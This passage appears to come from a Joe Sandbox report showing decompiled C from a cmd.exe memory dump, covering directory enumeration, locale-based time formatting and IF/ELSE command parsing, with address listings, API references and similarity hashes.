					return E011E6FD0(_t76, _t119, _v12 ^ _t160, _t145, _t151, _t157);
				}
				_t124 = __ecx;
				_t145 =  &(__ecx[1]);
				do {
					_t78 =  *_t124;
					_t124 = _t124 + 2;
				} while (_t78 != 0);
				_t157 = _v1152;
				_t126 = _t124 - _t145 >> 1;
				_t79 = (_t124 - _t145 >> 1) - 2;
				_v1164 = _t79;
				 *_t157 = _t79;
				_t80 = GetFileAttributesW(__ecx);
				if(_t80 == 0xffffffff) {
					_push(0);
					_push(GetLastError());
					E011DC5A2(_t126);
					goto L10;
				}
				if((_t80 & 0x00000010) != 0) {
					_t129 = _t119;
					_t146 =  &(_t129[1]);
					do {
						_t83 =  *_t129;
						_t129 =  &(_t129[1]);
					} while (_t83 != 0);
					_t131 = _t129 - _t146 >> 1;
					_t84 = 0x5c;
					_push(0x2a);
					if( *((intOrPtr*)(_t119 + _t131 * 2 - 2)) != _t84) {
						 *((short*)(_t119 + 4 + _t131 * 2)) = 0;
						_pop(_t145);
					} else {
						_t145 = 0;
						_pop(_t84);
					}
					_t119[_t131] = _t84;
					 *(_t119 + 2 + _t131 * 2) = _t145;
					_t86 = FindFirstFileW(_t119,  &_v1144);
					_v1156 = _t86;
					if(_t86 != 0xffffffff) {
						_t154 = 1;
						do {
							_t131 = ".";
							_t87 =  &(_v1144.cFileName);
							while(1) {
								_t145 =  *_t87;
								if(_t145 !=  *_t131) {
									break;
								}
								if(_t145 == 0) {
									L26:
									_t88 = 0;
									L28:
									if(_t88 == 0) {
										goto L57;
									}
									_t131 = L"..";
									_t96 =  &(_v1144.cFileName);
									while(1) {
										_t145 =  *_t96;
										if(_t145 !=  *_t131) {
											break;
										}
										if(_t145 == 0) {
											L34:
											_t97 = 0;
											L36:
											if(_t97 == 0) {
												goto L57;
											}
											_t134 =  &(_v1144.cFileName);
											_t145 = _t134 + 2;
											do {
												_t98 =  *_t134;
												_t134 = _t134 + 2;
											} while (_t98 != _v1148);
											_t135 = _t134 - _t145;
											_t131 = _t135 >> 1;
											if(_t135 == 0) {
												goto L57;
											}
											if((_v1144.dwFileAttributes & 0x00000010) != 0) {
												_t99 =  *_t157;
												if(_t99 <= _t131) {
													_t99 = _t131;
												}
												 *_t157 = _t99;
												goto L57;
											}
											_v28 = 1;
											_v32 = 0;
											_v24 = 0x104;
											memset( &_v552, 0, 0x104);
											_t161 = _t161 + 0xc;
											if(E011E0C70( &_v552, ((0 | _v28 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) < 0) {
												SetLastError(8);
												L60:
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												L61:
												_t157 = GetLastError();
												FindClose(_v1156);
												if(_t154 != 0) {
													goto L10;
												}
												if(_t157 == 0x12) {
													goto L7;
												}
												_push(0);
												goto L64;
											}
											E011E0D89(_t145, _t119);
											_t148 = _v32;
											_t138 = _t148;
											if(_t148 == 0) {
												_t138 =  &_v552;
											}
											_t159 = _t138 + 2;
											do {
												_t110 =  *_t138;
												_t138 = _t138 + 2;
											} while (_t110 != _v1148);
											_t140 = _t138 - _t159 >> 1;
											if(_t148 == 0) {
												_t148 =  &_v552;
											}
											 *((short*)(_t148 + _t140 * 2 - 2)) = 0;
											E011E0CF2(_t148,  &(_v1144.cFileName));
											_t142 = _v32;
											if(_v32 == 0) {
												_t142 =  &_v552;
											}
											_t145 = _v24;
											if(E011DB89C(_t142, _v24,  &_v1160) == 0) {
												goto L60;
											} else {
												_t157 = _v1152;
												_t144 = _v1164 + _v1160;
												_t116 =  *_t157;
												if(_t116 <= _t144) {
													_t116 = _t144;
												}
												 *_t157 = _t116;
												__imp__??_V@YAXPAX@Z(_v32);
												_pop(_t131);
												goto L57;
											}
										}
										_t145 =  *((intOrPtr*)(_t96 + 2));
										_t33 = _t131 + 2; // 0x2e
										if(_t145 !=  *_t33) {
											break;
										}
										_t96 = _t96 + 4;
										_t131 = _t131 + 4;
										if(_t145 != 0) {
											continue;
										}
										goto L34;
									}
									asm("sbb eax, eax");
									_t97 = _t96 | 0x00000001;
									goto L36;
								}
								_t145 =  *((intOrPtr*)(_t87 + 2));
								_t30 = _t131 + 2; // 0x200000
								if(_t145 !=  *_t30) {
									break;
								}
								_t87 = _t87 + 4;
								_t131 = _t131 + 4;
								if(_t145 != 0) {
									continue;
								}
								goto L26;
							}
							asm("sbb eax, eax");
							_t88 = _t87 | 0x00000001;
							goto L28;
							L57:
							_t154 = FindNextFileW(_v1156,  &_v1144);
						} while (_t154 != 0);
						goto L61;
					} else {
						_t157 = GetLastError();
						FindClose(0xffffffff);
						if(_t157 == 2 || _t157 == 0x12) {
							goto L7;
						} else {
							_push(0);
							L64:
							_push(_t157);
							E011DC5A2(_t131);
							_t76 = 0;
							goto L8;
						}
					}
				}
				L7:
				_t76 = 1;
				goto L8;
			}




















































                                    0x011db89c
                                    0x011db8a7
                                    0x011db8ae
                                    0x011db8b5
                                    0x011db8b7
                                    0x011db8be
                                    0x011db8c3
                                    0x011db8c9
                                    0x011db8cc
                                    0x011db8cc
                                    0x011db8cf
                                    0x011db8d2
                                    0x011db8d9
                                    0x011db8e0
                                    0x011e9da8
                                    0x011e9da8
                                    0x011db928
                                    0x011db92b
                                    0x011db938
                                    0x011db938
                                    0x011db8e6
                                    0x011db8ea
                                    0x011db8ed
                                    0x011db8ed
                                    0x011db8f0
                                    0x011db8f3
                                    0x011db8f8
                                    0x011db900
                                    0x011db903
                                    0x011db906
                                    0x011db90c
                                    0x011db90e
                                    0x011db917
                                    0x011e9d99
                                    0x011e9da0
                                    0x011e9da1
                                    0x00000000
                                    0x011e9da7
                                    0x011db91f
                                    0x011e9daf
                                    0x011e9db1
                                    0x011e9db4
                                    0x011e9db4
                                    0x011e9db7
                                    0x011e9dba
                                    0x011e9dc1
                                    0x011e9dc5
                                    0x011e9dc6
                                    0x011e9dcd
                                    0x011e9dd6
                                    0x011e9ddb
                                    0x011e9dcf
                                    0x011e9dcf
                                    0x011e9dd1
                                    0x011e9dd1
                                    0x011e9ddc
                                    0x011e9de8
                                    0x011e9ded
                                    0x011e9df3
                                    0x011e9dfc
                                    0x011e9e28
                                    0x011e9e29
                                    0x011e9e29
                                    0x011e9e2e
                                    0x011e9e34
                                    0x011e9e34
                                    0x011e9e3a
                                    0x00000000
                                    0x00000000
                                    0x011e9e3f
                                    0x011e9e56
                                    0x011e9e56
                                    0x011e9e5f
                                    0x011e9e61
                                    0x00000000
                                    0x00000000
                                    0x011e9e67
                                    0x011e9e6c
                                    0x011e9e72
                                    0x011e9e72
                                    0x011e9e78
                                    0x00000000
                                    0x00000000
                                    0x011e9e7d
                                    0x011e9e94
                                    0x011e9e94
                                    0x011e9e9d
                                    0x011e9e9f
                                    0x00000000
                                    0x00000000
                                    0x011e9ea5
                                    0x011e9eab
                                    0x011e9eae
                                    0x011e9eae
                                    0x011e9eb1
                                    0x011e9eb4
                                    0x011e9ebd
                                    0x011e9ebf
                                    0x011e9ec1
                                    0x00000000
                                    0x00000000
                                    0x011e9ece
                                    0x011e9fb6
                                    0x011e9fba
                                    0x011e9fbc
                                    0x011e9fbc
                                    0x011e9fbe
                                    0x00000000
                                    0x011e9fbe
                                    0x011e9ed6
                                    0x011e9edf
                                    0x011e9eea
                                    0x011e9eee
                                    0x011e9efb
                                    0x011e9f14
                                    0x011e9fe1
                                    0x011e9fe7
                                    0x011e9fea
                                    0x011e9ff0
                                    0x011e9ff1
                                    0x011e9ffd
                                    0x011e9fff
                                    0x011ea007
                                    0x00000000
                                    0x00000000
                                    0x011ea010
                                    0x00000000
                                    0x00000000
                                    0x011ea018
                                    0x00000000
                                    0x011ea018
                                    0x011e9f21
                                    0x011e9f26
                                    0x011e9f29
                                    0x011e9f2d
                                    0x011e9f2f
                                    0x011e9f2f
                                    0x011e9f35
                                    0x011e9f38
                                    0x011e9f38
                                    0x011e9f3b
                                    0x011e9f3e
                                    0x011e9f49
                                    0x011e9f4d
                                    0x011e9f4f
                                    0x011e9f4f
                                    0x011e9f57
                                    0x011e9f69
                                    0x011e9f6e
                                    0x011e9f73
                                    0x011e9f75
                                    0x011e9f75
                                    0x011e9f7b
                                    0x011e9f8c
                                    0x00000000
                                    0x011e9f8e
                                    0x011e9f8e
                                    0x011e9f9a
                                    0x011e9fa0
                                    0x011e9fa4
                                    0x011e9fa6
                                    0x011e9fa6
                                    0x011e9fab
                                    0x011e9fad
                                    0x011e9fb3
                                    0x00000000
                                    0x011e9fb3
                                    0x011e9f8c
                                    0x011e9e7f
                                    0x011e9e83
                                    0x011e9e87
                                    0x00000000
                                    0x00000000
                                    0x011e9e89
                                    0x011e9e8c
                                    0x011e9e92
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9e92
                                    0x011e9e98
                                    0x011e9e9a
                                    0x00000000
                                    0x011e9e9a
                                    0x011e9e41
                                    0x011e9e45
                                    0x011e9e49
                                    0x00000000
                                    0x00000000
                                    0x011e9e4b
                                    0x011e9e4e
                                    0x011e9e54
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e9e54
                                    0x011e9e5a
                                    0x011e9e5c
                                    0x00000000
                                    0x011e9fc0
                                    0x011e9fd3
                                    0x011e9fd5
                                    0x00000000
                                    0x011e9dfe
                                    0x011e9e06
                                    0x011e9e08
                                    0x011e9e11
                                    0x00000000
                                    0x011e9e20
                                    0x011e9e20
                                    0x011ea019
                                    0x011ea019
                                    0x011ea01a
                                    0x011ea020
                                    0x00000000
                                    0x011ea022
                                    0x011e9e11
                                    0x011e9dfc
                                    0x011db925
                                    0x011db927
                                    0x00000000

                                    APIs
                                    • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FE7,00000000), ref: 011DB90E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction ID: 03a1585ae39d91d889194c503c58d7a2b4bc2695e7d62243d6e44f0e521deefa
                                    • Opcode Fuzzy Hash: 4527101172f83b501611864d7501998ab0620b3570cfab8cfee1841df50d60d9
                                    • Instruction Fuzzy Hash: D891257290051A8BDF2DDFA8C8486FEB7F1EF54218F4585ADDA0AD7244FB319A81CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D96A0, Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 237timeCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 70%
                                    			E011D96A0(void* __ecx, void* __edx, signed int _a4, unsigned int _a8) {
				signed int _v8;
				short _v76;
				short _v332;
				signed short _v334;
				signed short _v336;
				signed int _v338;
				signed int _v340;
				struct _SYSTEMTIME _v348;
				signed int _v352;
				intOrPtr _v356;
				void* _v360;
				struct _FILETIME _v368;
				struct _FILETIME _v376;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				char* _t67;
				signed int _t73;
				signed int _t74;
				signed int _t76;
				signed int _t79;
				signed short _t80;
				signed int _t85;
				signed int _t88;
				signed int _t92;
				signed int _t99;
				void* _t106;
				void* _t111;
				signed int _t112;
				signed int _t114;
				void* _t116;
				void* _t119;
				signed int _t121;
				signed int _t122;
				void* _t123;
				signed int _t124;
				signed int _t126;
				signed int _t127;
				intOrPtr* _t131;
				void* _t133;
				int _t134;
				void* _t136;
				signed int _t138;
				signed int _t140;
				signed int _t141;
				void* _t142;

				_t58 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t58 ^ _t141;
				_t139 = _a4;
				_t136 = __edx;
				if(__ecx != 0) {
					E011F3C49(__ecx,  &_v368);
				} else {
					GetSystemTime( &_v348);
					SystemTimeToFileTime( &_v348,  &_v368);
				}
				FileTimeToLocalFileTime( &_v368,  &_v376);
				FileTimeToSystemTime( &_v376,  &_v348);
				if(_t136 != 1) {
					__eflags =  *0x1213cc9;
					if( *0x1213cc9 == 0) {
						__eflags =  *0x11fd0cc;
						_t67 = "a";
						_t114 = _v340 & 0x0000ffff;
						if( *0x11fd0cc == 0) {
							_t67 = " ";
						} else {
							__eflags = _t114 - 0xc;
							if(__eflags < 0) {
								__eflags = _t114;
								if(_t114 == 0) {
									_t114 = 0xc;
								}
							} else {
								if(__eflags > 0) {
									__eflags = _t114;
								}
								_t67 = "p";
							}
						}
						_push(_t67);
						_push(_v338 & 0x0000ffff);
						_push(0x11ff81c);
						E011E274C( &_v76, 0x20, L"%02d%s%02d%s", _t114);
						L48:
						__eflags = _t139;
						if(_t139 != 0) {
							_t130 = _a8;
							E011E1040(_t139, _a8,  &_v76);
							_t116 = _t139 + 2;
							do {
								_t73 =  *_t139;
								_t139 = _t139 + 2;
								__eflags = _t73;
							} while (_t73 != 0);
							goto L6;
						}
						_t131 =  &_v76;
						_t119 = _t131 + 2;
						do {
							_t76 =  *_t131;
							_t131 = _t131 + 2;
							__eflags = _t76;
						} while (_t76 != 0);
						_t130 = _t131 - _t119 >> 1;
						_t74 = E011E2616( &_v76, _t131 - _t119 >> 1);
						goto L7;
					}
					_v352 = 0;
					_t79 = GetLocaleInfoW(E011E41A4(), 0x1003,  &_v332, 0x80);
					__eflags = _t79;
					if(_t79 != 0) {
						L20:
						_t80 = _v332;
						_t136 =  &_v332;
						__eflags = _t80;
						if(_t80 == 0) {
							L37:
							_t85 = GetTimeFormatW(E011E41A4(), 2,  &_v348,  &_v332,  &_v76, 0x20);
							__eflags = _t85;
							if(_t85 == 0) {
								_v76 = _t85;
							}
							goto L48;
						}
						_t112 = _t80 & 0x0000ffff;
						_t121 = 0;
						__eflags = 0;
						do {
							__eflags = _t112 - 0x27;
							if(_t112 != 0x27) {
								__eflags = _t121;
								if(_t121 == 0) {
									__eflags = _t112 - 0x68;
									if(_t112 == 0x68) {
										L29:
										_t122 = 0;
										__eflags = 0;
										do {
											_t136 = _t136 + 2;
											_t122 = _t122 + 1;
											__eflags =  *_t136 - _t112;
										} while ( *_t136 == _t112);
										_t133 = _t136 +  ~_t122 * 2;
										_v360 = _t133;
										_t136 = _t133 + 2;
										__eflags = _t122 - 1;
										if(_t122 != 1) {
											L35:
											_t121 = _v352;
											goto L36;
										}
										_t123 = _t133;
										_v356 = _t123 + 2;
										do {
											_t92 =  *_t123;
											_t123 = _t123 + 2;
											__eflags = _t92;
										} while (_t92 != 0);
										_t124 = _t123 - _v356;
										__eflags = _t124;
										memmove(_t136, _t133, 2 + (_t124 >> 1) * 2);
										_t142 = _t142 + 0xc;
										 *_v360 = _t112;
										goto L35;
									}
									__eflags = _t112 - 0x48;
									if(_t112 == 0x48) {
										goto L29;
									}
									__eflags = _t112 - 0x6d;
									if(_t112 != 0x6d) {
										goto L36;
									}
									goto L29;
								}
								_t136 = _t136 + 2;
								goto L36;
							}
							_t136 = _t136 + 2;
							__eflags = _t121;
							_t121 = 0 | _t121 == 0x00000000;
							_v352 = _t121;
							L36:
							_t88 =  *(_t136 + 2) & 0x0000ffff;
							_t136 = _t136 + 2;
							_t112 = _t88;
							__eflags = _t88;
						} while (_t88 != 0);
						goto L37;
					}
					_t126 =  &_v332;
					_t134 = 0x80;
					_t138 = L"HH:mm:ss t" - _t126;
					__eflags = _t138;
					while(1) {
						_t25 = _t134 + 0x7fffff7e; // 0x7ffffffe
						__eflags = _t25;
						if(_t25 == 0) {
							break;
						}
						_t99 =  *(_t138 + _t126) & 0x0000ffff;
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						 *_t126 = _t99;
						_t126 = _t126 + 2;
						_t134 = _t134 - 1;
						__eflags = _t134;
						if(_t134 != 0) {
							continue;
						}
						L18:
						_t126 = _t126 - 2;
						__eflags = _t126;
						L19:
						__eflags = 0;
						 *_t126 = 0;
						goto L20;
					}
					__eflags = _t134;
					if(_t134 != 0) {
						goto L19;
					}
					goto L18;
				} else {
					_t127 = _v334 & 0x0000ffff;
					_t130 = 0xcccccccd * _t127 >> 0x20 >> 3;
					_push(0xcccccccd * _t127 >> 0x20 >> 3);
					_push(0x11ff7fc);
					_push(_v336 & 0x0000ffff);
					_push(0x11ff81c);
					_push(_v338 & 0x0000ffff);
					_push(0x11ff81c);
					_push(_v340 & 0x0000ffff);
					_push(L"%2d%s%02d%s%02d%s%02d");
					if(_t139 == 0) {
						_t74 = E011E25D9();
						L7:
						return E011E6FD0(_t74, _t111, _v8 ^ _t141, _t130, _t136, _t139);
					} else {
						_push(_a8);
						_push(_t139);
						E011E274C();
						_t116 = _t139 + 2;
						do {
							_t106 =  *_t139;
							_t139 = _t139 + 2;
						} while (_t106 != 0);
						L6:
						_t140 = _t139 - _t116;
						_t139 = _t140 >> 1;
						_t74 = _t140 >> 1;
						goto L7;
					}
				}
			}


















































                                    0x011d96ab
                                    0x011d96b2
                                    0x011d96b7
                                    0x011d96bb
                                    0x011d96bf
                                    0x011f0ad6
                                    0x011d96c5
                                    0x011d96cc
                                    0x011d96e0
                                    0x011d96e0
                                    0x011d96f4
                                    0x011d9708
                                    0x011d9711
                                    0x011f0aed
                                    0x011f0af4
                                    0x011f0c53
                                    0x011f0c5a
                                    0x011f0c5f
                                    0x011f0c66
                                    0x011f0c84
                                    0x011f0c68
                                    0x011f0c68
                                    0x011f0c6b
                                    0x011f0c79
                                    0x011f0c7b
                                    0x011f0c7d
                                    0x011f0c7d
                                    0x011f0c6d
                                    0x011f0c6d
                                    0x011f0c6f
                                    0x011f0c6f
                                    0x011f0c72
                                    0x011f0c72
                                    0x011f0c6b
                                    0x011f0c89
                                    0x011f0c91
                                    0x011f0c92
                                    0x011f0ca3
                                    0x011f0cab
                                    0x011f0cab
                                    0x011f0cad
                                    0x011f0cd1
                                    0x011f0cda
                                    0x011f0cdf
                                    0x011f0ce2
                                    0x011f0ce2
                                    0x011f0ce5
                                    0x011f0ce8
                                    0x011f0ce8
                                    0x00000000
                                    0x011f0ced
                                    0x011f0caf
                                    0x011f0cb2
                                    0x011f0cb5
                                    0x011f0cb5
                                    0x011f0cb8
                                    0x011f0cbb
                                    0x011f0cbb
                                    0x011f0cc5
                                    0x011f0cc7
                                    0x00000000
                                    0x011f0cc7
                                    0x011f0b05
                                    0x011f0b1b
                                    0x011f0b21
                                    0x011f0b23
                                    0x011f0b65
                                    0x011f0b65
                                    0x011f0b6c
                                    0x011f0b72
                                    0x011f0b75
                                    0x011f0c27
                                    0x011f0c43
                                    0x011f0c49
                                    0x011f0c4b
                                    0x011f0c4d
                                    0x011f0c4d
                                    0x00000000
                                    0x011f0c4b
                                    0x011f0b7b
                                    0x011f0b7e
                                    0x011f0b7e
                                    0x011f0b80
                                    0x011f0b80
                                    0x011f0b84
                                    0x011f0b9a
                                    0x011f0b9c
                                    0x011f0ba3
                                    0x011f0ba7
                                    0x011f0bb5
                                    0x011f0bb5
                                    0x011f0bb5
                                    0x011f0bb7
                                    0x011f0bb7
                                    0x011f0bba
                                    0x011f0bbb
                                    0x011f0bbb
                                    0x011f0bc4
                                    0x011f0bc7
                                    0x011f0bcd
                                    0x011f0bd0
                                    0x011f0bd3
                                    0x011f0c0f
                                    0x011f0c0f
                                    0x00000000
                                    0x011f0c0f
                                    0x011f0bd5
                                    0x011f0bda
                                    0x011f0be0
                                    0x011f0be0
                                    0x011f0be3
                                    0x011f0be6
                                    0x011f0be6
                                    0x011f0beb
                                    0x011f0beb
                                    0x011f0bfd
                                    0x011f0c09
                                    0x011f0c0c
                                    0x00000000
                                    0x011f0c0c
                                    0x011f0ba9
                                    0x011f0bad
                                    0x00000000
                                    0x00000000
                                    0x011f0baf
                                    0x011f0bb3
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011f0bb3
                                    0x011f0b9e
                                    0x00000000
                                    0x011f0b9e
                                    0x011f0b88
                                    0x011f0b8b
                                    0x011f0b90
                                    0x011f0b92
                                    0x011f0c15
                                    0x011f0c15
                                    0x011f0c19
                                    0x011f0c1c
                                    0x011f0c1e
                                    0x011f0c1e
                                    0x00000000
                                    0x011f0b80
                                    0x011f0b25
                                    0x011f0b32
                                    0x011f0b37
                                    0x011f0b37
                                    0x011f0b39
                                    0x011f0b39
                                    0x011f0b3f
                                    0x011f0b41
                                    0x00000000
                                    0x00000000
                                    0x011f0b43
                                    0x011f0b47
                                    0x011f0b4a
                                    0x00000000
                                    0x00000000
                                    0x011f0b4c
                                    0x011f0b4f
                                    0x011f0b52
                                    0x011f0b52
                                    0x011f0b55
                                    0x00000000
                                    0x00000000
                                    0x011f0b5d
                                    0x011f0b5d
                                    0x011f0b5d
                                    0x011f0b60
                                    0x011f0b60
                                    0x011f0b62
                                    0x00000000
                                    0x011f0b62
                                    0x011f0b59
                                    0x011f0b5b
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d9717
                                    0x011d9717
                                    0x011d972c
                                    0x011d972f
                                    0x011d9730
                                    0x011d9735
                                    0x011d973d
                                    0x011d9742
                                    0x011d974a
                                    0x011d974f
                                    0x011d9750
                                    0x011d9757
                                    0x011f0ae0
                                    0x011d9781
                                    0x011d9791
                                    0x011d975d
                                    0x011d975d
                                    0x011d9760
                                    0x011d9761
                                    0x011d9769
                                    0x011d9770
                                    0x011d9770
                                    0x011d9773
                                    0x011d9776
                                    0x011d977b
                                    0x011d977b
                                    0x011d977d
                                    0x011d977f
                                    0x00000000
                                    0x011d977f
                                    0x011d9757

                                    APIs
                                    • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,011FF830,?,00002000), ref: 011D96CC
                                    • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D96E0
                                    • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 011D96F4
                                    • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 011D9708
                                    • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00001003,?,00000080), ref: 011F0B1B
                                    • GetTimeFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000002,?,?,?,00000020), ref: 011F0C43
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Time$File$System$FormatInfoLocalLocale
                                    • String ID: %02d%s%02d%s$%2d%s%02d%s%02d%s%02d$HH:mm:ss t
                                    • API String ID: 55602301-2516506544
                                    • Opcode ID: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction ID: dd12c86237fe8f982918843d00b74af6a34bff32662dbf0263de2fd5a8333ffa
                                    • Opcode Fuzzy Hash: d934bdcb8319a6cec73d4b6ba420af93533aa4ae2e44a50143315b30351467ba
                                    • Instruction Fuzzy Hash: B981D275A0061A9ADF2CDF59CC54BFA73B9AF48704F04419EFA0AE7142EB309A85CB51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011DD803, Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 212COMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 62%
                                    			E011DD803(void* __eax, WCHAR* __ebx, void* __ecx) {
				void* __edi;
				void* __esi;
				short _t56;
				short _t57;
				signed int _t59;
				intOrPtr* _t62;
				intOrPtr _t63;
				signed int _t66;
				signed int _t68;
				signed int _t71;
				void* _t72;
				void* _t73;
				void* _t75;
				signed int _t76;
				void* _t81;
				signed int _t85;
				signed int _t86;
				WCHAR* _t90;
				signed int _t91;
				void* _t92;
				WCHAR* _t93;
				signed int _t100;
				WCHAR* _t104;
				void* _t105;
				void* _t110;
				void* _t114;
				signed int _t118;
				signed int _t125;
				WCHAR* _t132;
				void* _t138;
				signed int _t140;
				void* _t144;
				void* _t150;
				void* _t156;
				WCHAR* _t157;
				void* _t160;
				signed int _t162;
				signed int _t165;
				signed int _t166;
				void* _t167;
				void* _t168;
				void* _t170;
				signed int _t171;
				signed int _t173;
				void* _t174;
				signed int _t175;
				signed int _t177;
				signed int _t180;

				_t104 = __ebx;
				_t157 = 0;
				__imp___wcsicmp(L"IF/?", 0x120faa0, _t156, _t170, __ecx);
				_t186 = __eax;
				if(__eax == 0) {
					 *0x120faa4 = 0;
					_t157 = 1;
				}
				_t110 = 0x2c;
				_t171 = E011DE9A0(_t110, _t186);
				if(_t157 != 0) {
					_t56 = 0x2f;
					 *0x120faa0 = _t56;
					_t57 = 0x3f;
					 *0x120faa2 = _t57;
					 *0x120faa4 = 0;
				} else {
					E011DF030(0);
				}
				_t149 = 0x2c;
				_t59 = E011DDCE1(_t104, _t149, _t157);
				if(_t59 != 0) {
					 *(_t171 + 0x38) =  *(_t171 + 0x38) & 0x00000000;
					 *_t171 = 0x3c;
					goto L13;
				} else {
					_t160 = 0;
					if( *0x1213cc9 == _t59) {
						L6:
						_t149 = 0;
						E011DF300(_t59, 0, 0, 0);
					} else {
						__imp___wcsicmp(0x120faa0, L"/I");
						if(_t59 == 0) {
							_t160 = 1;
						} else {
							goto L6;
						}
					}
					_t62 = E011DCDA2(0);
					 *((intOrPtr*)(_t171 + 0x3c)) = _t62;
					if(_t62 != 0 && _t160 != 0) {
						__eflags =  *_t62 - 0x38;
						if( *_t62 == 0x38) {
							_t62 =  *((intOrPtr*)(_t62 + 0x3c));
						}
						 *((intOrPtr*)(_t62 + 0x40)) = 2;
					}
					_t114 = 0x2c;
					_t63 = E011DDC74(_t104, _t114);
					 *((intOrPtr*)(_t171 + 0x40)) = _t63;
					if(_t63 == 0) {
						E011F82EB(_t114);
					}
					if(E011DEEC8() == 0) {
						L13:
						return _t171;
					} else {
						_t66 = E011DF030(0);
						__imp___wcsicmp(L"ELSE", 0x120faa0);
						if(_t66 == 0) {
							_t118 =  *0x120fa8c +  *0x120fa8c;
							_t68 = E011E00B0(_t118);
							__eflags = _t68;
							if(_t68 == 0) {
								E011F9287(_t118);
								__imp__longjmp(0x120b8b8, 1);
								asm("int3");
								while(1) {
									L58:
									 *((short*)(_t149 + _t118 * 2)) = 0;
									while(1) {
										_t71 =  *(_t171 + 0x14);
										_t171 = _t71;
										__eflags = _t71;
										if(_t71 == 0) {
											break;
										}
										_t119 =  *(_t171 + 4);
										_t162 =  *(_t171 + 4);
										_t150 = _t162 + 2;
										do {
											_t72 =  *_t162;
											_t162 = _t162 + 2;
											__eflags = _t72 - _t104;
										} while (_t72 != _t104);
										_t73 = E011E22C0(_t104, _t119);
										_t149 = (_t162 - _t150 >> 1) + 1;
										E011E1040( *(_t171 + 4), (_t162 - _t150 >> 1) + 1, _t73);
										__eflags =  *((intOrPtr*)(_t171 + 8)) - _t104;
										if( *((intOrPtr*)(_t171 + 8)) == _t104) {
											_t149 =  *(_t171 + 4);
											_t140 = _t149;
											_t168 = _t140 + 2;
											do {
												_t75 =  *_t140;
												_t140 = _t140 + 2;
												__eflags = _t75 - _t104;
											} while (_t75 != _t104);
											_t118 = (_t140 - _t168 >> 1) - 1;
											__eflags = _t118 - 1;
											if(_t118 > 1) {
												__eflags =  *((short*)(_t149 + _t118 * 2)) - 0x3a;
												if( *((short*)(_t149 + _t118 * 2)) == 0x3a) {
													goto L58;
												}
											}
										}
									}
									_t165 =  *(_t180 - 0x228);
									_t173 =  *(_t180 - 0x224);
									__eflags = _t173 - 3;
									if(_t173 == 3) {
										_t76 =  *0x1213cd4;
										 *(_t180 - 0x228) = _t76;
										goto L33;
									} else {
										_t138 = 0x10;
										_t76 = E011E00B0(_t138);
										 *(_t180 - 0x228) = _t76;
										__eflags = _t76;
										if(_t76 == 0) {
											L52:
											_t104 = 1;
										} else {
											 *(_t76 + 0xc) =  *0x1213cd4;
											 *0x1213cd4 = _t76;
											 *(_t76 + 8) = _t165;
											 *_t76 = _t173;
											L33:
											_t166 =  *(_t165 + 0x34);
											__eflags = _t166;
											if(_t166 != 0) {
												_t175 = _t173 | 0xffffffff;
												__eflags = _t175;
												do {
													__eflags =  *(_t166 + 8) - _t104;
													if( *(_t166 + 8) != _t104) {
														goto L48;
													} else {
														__imp___get_osfhandle( *_t166);
														__eflags = _t76 - _t175;
														if(_t76 == _t175) {
															L63:
															 *(_t166 + 8) = _t175;
															goto L41;
														} else {
															__imp___get_osfhandle( *_t166);
															__eflags = _t76 - 0xfffffffe;
															if(_t76 == 0xfffffffe) {
																goto L63;
															} else {
																_t92 = E011E0178(_t76);
																__eflags = _t92;
																if(_t92 == 0) {
																	_t92 = E011F9953(_t92,  *_t166);
																	__eflags = _t92;
																	if(_t92 != 0) {
																		goto L39;
																	} else {
																		__imp___get_osfhandle( *_t166, _t104, _t104, 1);
																		_pop(_t136);
																		_t92 = SetFilePointer(_t92, ??, ??, ??);
																		__eflags = _t92 - _t175;
																		if(_t92 != _t175) {
																			goto L39;
																		} else {
																			E011E274C(0x1213d00, 0x104, L"%d",  *_t166);
																			_push(0x1213d00);
																			_push(1);
																			_push(0x40002721);
																			goto L75;
																		}
																	}
																} else {
																	L39:
																	_t136 =  *_t166;
																	_t93 = E011DDBCE(_t92,  *_t166);
